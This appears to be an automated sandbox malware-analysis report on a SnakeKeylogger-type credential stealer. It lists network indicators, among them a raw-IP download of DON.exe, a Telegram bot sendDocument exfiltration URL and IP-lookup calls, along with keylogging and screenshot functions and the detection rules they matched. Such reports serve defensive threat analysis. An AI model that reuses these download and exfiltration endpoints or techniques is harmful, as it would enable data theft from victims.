                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.11:49709 version: TLS 1.0
                      Source: unknown | TCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /dev/DON.exe HTTP/1.1 | Host: 176.65.144.3 | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                      Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global traffic | DNS traffic detected: DNS query: mail.tsengg.com
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B09000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/DON.exe
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.65.144.3/dev/DON.exeP
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/bYn
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
                      Source: powershell.exe, 00000000.00000002.1122082133.0000000007924000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000000.00000002.1122082133.0000000007924000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftbN
                      Source: svchost.exe, 00000006.00000002.2827368685.0000021EB5E00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: edb.log.6.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.0/1
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.adobe.c/r1
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ns.microsoft.1.1
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.i.lencr.org/0#
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://r10.o.lencr.org0#
                      Source: powershell.exe, 00000000.00000002.1116625210.00000000050F1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1133468244.0000000002B6F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.or221
                      Source: x.exe, 00000005.00000002.3561012005.0000000006313000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                      Source: x.exe, 00000005.00000002.3561012005.0000000006313000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                      Source: powershell.exe, 00000000.00000002.1116625210.00000000050F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                      Source: edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 00000006.00000003.1203431663.0000021EB5CF0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
                      Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs | .Net Code: TakeScreenshot
Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\AppData\Local\Temp\x.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6676, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D50848
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D58160
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D57AF0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D51DD0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D59818
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D50838
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D57AE0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D51DC0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D595F0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D595E1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D57ED1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00D597CC
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_02AAC530
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_02AA9480
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_02AAC521
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_02AA2DD1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_02AA946F
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655F548
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655D028
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655F538
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655E1D7
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0655E1E8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_06557B08
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0706B4A0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0706A3B8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_070667C8
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_070667D4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0706B490
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_07067491
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_070674A0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\RUNPEE.dll ACD44760A750AFD0DB17EC0B55BD092372AA0FE827B90B891B6B8C19638174F6
Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6676, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
